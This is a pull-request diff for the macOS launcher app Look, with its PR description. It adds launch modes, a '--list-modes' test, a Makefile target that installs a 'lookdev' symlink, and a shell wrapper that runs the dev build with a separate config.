+    fn the_json_listing_is_valid_and_complete() {
+        let parsed: serde_json::Value =
+            serde_json::from_str(&list_json()).expect("should be valid JSON");
+
+        assert_eq!(
+            parsed.as_array().expect("should be an array").len(),
+            MODES.len()
+        );
+    }
+}

--- a/scripts/Makefile.mac
+++ b/scripts/Makefile.mac
@@ -36,28 +36,28 @@ REAL_DB_PATH := $(HOME)/Library/Application Support/look/look.db
 DEV_CONFIG_PATH ?= $(HOME)/.look/config.dev
 DEV_OPEN_ENV = env -u LOOK_DB_PATH LOOK_CONFIG_PATH="$(DEV_CONFIG_PATH)" LOOK_DEV_HINT=1 LOOK_LOG_LEVEL=debug LOOK_UI_DEBUG_EVENTS=1
 
-.PHONY: help core-check ffi-check ffi-build ffi-build-release ffi-unstale app-build app-ensure-bundle app-stop app-run app-open app-install-dev app-run-dev app-uninstall-dev app-logs app-logs-all symbols db-path db-status db-shell db-reset db-refresh ffi-run
+.PHONY: help core-check ffi-check ffi-build ffi-build-release ffi-unstale app-build app-ensure-bundle app-stop app-run app-install-dev app-run-dev app-uninstall-dev dev-cli app-logs app-logs-all symbols db-path db-status db-shell db-reset db-refresh
 
 help:
 	@printf "look developer tasks\n\n"
 	@printf "build/check\n"
 	@printf "  make core-check          - cargo check core workspace\n"
 	@printf "  make ffi-check          - cargo check ffi crate\n"
-	@printf "  make ffi-build          - build Rust FFI dll (debug) - Windows\n"
-	@printf "  make ffi-build-release  - build Rust FFI dll (release)\n"
+	@printf "  make ffi-build          - build the ffi crate alone (link check; the app builds its own)\n"
+	@printf "  make ffi-build-release  - same, release profile\n"
 	@printf "  make app-build          - xcodebuild app (macOS, includes rust ffi build/link)\n"
 	@printf "  make ffi-unstale        - drop RustBuild/liblook_ffi.a when the Rust build identity changes\n"
 	@printf "  make symbols            - verify ffi symbols in app binary\n\n"
 	@printf "run app\n"
 	@printf "  make app-stop     - stop running Look app process\n"
 	@printf "  make app-run      - stop running app, then open local app with dev config\n"
-	@printf "  make app-open     - open built app bundle\n"
 	@printf "  make app-install-dev - install side-by-side /Applications/$(DEV_APP_NAME).app\n"
 	@printf "  make app-run-dev  - install+open side-by-side dev app with dev config\n"
 	@printf "  make app-uninstall-dev - remove side-by-side dev app from /Applications\n"
+	@printf "  make dev-cli      - install the lookdev command (done by app-install-dev)\n"
 	@printf "  make app-logs     - stream app logs (predicate: $(LOG_PREDICATE))\n"
 	@printf "  make app-logs-all - stream all logs for process Look\n"
-	@printf "  (override config) make app-run DEV_CONFIG_PATH=\"$$HOME/.look/config.dev\"\n\n"
+	@printf "  (override config) make app-run DEV_CONFIG_PATH=\"$$HOME/.look/config.qa\"\n\n"
 	@printf "database\n"
 	@printf "  make db-path      - print real db path\n"
 	@printf "  make db-status    - inspect candidates/usage tables\n"
@@ -106,9 +106,6 @@ app-run: app-build app-stop app-ensure-bundle
 	@echo "Opening local app with config: $(DEV_CONFIG_PATH)"
 	@$(DEV_OPEN_ENV) open -n "$(APP_BUNDLE)"
 
-app-open: app-build app-ensure-bundle
-	@open "$(APP_BUNDLE)"
-
 app-install-dev: app-build app-ensure-bundle
 	@echo "Installing side-by-side dev app: $(DEV_APP_INSTALL_BUNDLE)"
 	@osascript -e 'tell application id "$(DEV_APP_ID)" to quit' >/dev/null 2>&1 || true
@@ -128,6 +125,15 @@ app-install-dev: app-build app-ensure-bundle
 		"$(DEV_APP_INSTALL_BUNDLE)" >/dev/null
 	@"$(LSREGISTER)" -f "$(DEV_APP_INSTALL_BUNDLE)" >/dev/null
 	@echo "Installed $(DEV_APP_NAME) with bundle id $(DEV_APP_ID)"
+	@$(MAKE) --no-print-directory dev-cli
+
+# Beside whatever directory `lookapp` already lives in.
+dev-cli:
+	@dir=$$(dirname "$$(command -v lookapp 2>/dev/null || echo /opt/homebrew/bin/lookapp)"); \
+	if [ ! -w "$$dir" ]; then dir="$$HOME/.local/bin"; mkdir -p "$$dir"; fi; \
+	ln -sf "$(CURDIR)/scripts/lookdev" "$$dir/lookdev"; \
+	echo "Installed $$dir/lookdev"; \
+	case ":$$PATH:" in *":$$dir:"*) ;; *) echo "Add to PATH: export PATH=\"$$dir:\$$PATH\"" ;; esac
 
 app-run-dev: app-install-dev app-stop
 	@echo "Opening side-by-side dev app with config: $(DEV_CONFIG_PATH)"

--- a/scripts/lookdev
+++ b/scripts/lookdev
@@ -1,0 +1,27 @@
+#!/bin/sh
+# lookdev - the dev build's handle, the way `lookapp` is the installed one's.
+# `lookapp` symlinks into /Applications/Look.app, so it always runs the release
+# binary no matter what you just built. Installed by `make app-install-dev`.
+#
+#   lookdev                 launch it with the dev config
+#   lookdev clipboard       open it in a mode
+#   lookdev --list-modes
+set -eu
+
+APP="${LOOK_DEV_APP:-/Applications/Look Dev.app}"
+CONFIG="${LOOK_DEV_CONFIG:-$HOME/.look/config.dev}"
+
+if [ ! -d "$APP" ]; then
+    echo "lookdev: $APP is not installed. Run: make app-install-dev" >&2
+    exit 3
+fi
+
+# `-u LOOK_DB_PATH` matches DEV_OPEN_ENV in scripts/Makefile.mac: an inherited
+# path would point the dev build at the release database.
+if [ "$#" -eq 0 ]; then
+    exec env -u LOOK_DB_PATH LOOK_CONFIG_PATH="$CONFIG" open -a "$APP"
+fi
+
+# The binary, not `open --args`: LaunchServices would activate the running
+# instance instead of starting a process that can read the arguments.
+exec env -u LOOK_DB_PATH LOOK_CONFIG_PATH="$CONFIG" "$APP/Contents/MacOS/Look" "$@"


### PR DESCRIPTION
## Summary

- Launch mode for Look, user can use command to call Look with preset mode and queries
Example:

- Toggle Look with clipboard history 

```
lookapp clipboard
```

- Toggle Look with clipboard history and a preset query (this will filter out all clipboards contain `golang`)

```
lookapp clipboard golang
```

https://github.com/user-attachments/assets/22fb1ec0-005f-4034-b1f1-8baa7a295e1d

- Updated Make, build script -> Dev should call `lookdev` instead of `lookapp` after running dev app with make app-run-dev

## Why

#436 

## Testing

- `core`
  - [x] `cargo check --workspace --manifest-path core/Cargo.toml`
  - [x] `cargo test --workspace --manifest-path core/Cargo.toml`

- `bridge/ffi`
  - [x] `cargo check --manifest-path bridge/ffi/Cargo.toml`
  - [x] `cargo test --manifest-path bridge/ffi/Cargo.toml`

- `apps/linows`
  - [x] `cargo check --manifest-path apps/linows/src-tauri/Cargo.toml`
  - [x] `cargo test --locked --manifest-path apps/linows/src-tauri/Cargo.toml`
  - [x] `cargo fmt --all --manifest-path apps/linows/src-tauri/Cargo.toml -- --check`
  - [x] `cargo clippy --locked --manifest-path apps/linows/src-tauri/Cargo.toml -- -D warnings`
  - [x] Tauri release bundle (if packaging / release flow changed): `cd apps/linows && cargo tauri build`
  - [x] macOS app (if `apps/macos/**` touched): `cd apps/macos/LauncherApp && swift test`
  - [x] macOS app (if `apps/macos/**` touched): `xcodebuild -project "apps/macos/LauncherApp/look-app.xcodeproj" -scheme "Look" -configuration Debug -sdk macosx build`
  - [x] Manual verification completed (if UI/behavior changed)

## Checklist

- [x] I have read and agree to the CLA (CLA.md)
- [x] PR title is clear and scoped
- [x] Docs updated for user-visible changes
- [x] No secrets or private files included
- [x] Backward compatibility considered


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

- **New Features**
  - Added launch modes for opening the app with queries, commands, and platform-specific options, including process listing.
  - Added mode discovery via `--list-modes`, with clear handling for unknown or unavailable modes.
  - Queries now work when launching a new app instance or sending them to an already-open window.
  - Added development launch support through the `lookdev` command.
  - Improved launcher focus and state reset when processing launch queries.

- **Documentation**
  - Documented development launch commands and configuration for macOS, Linux, and Windows.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->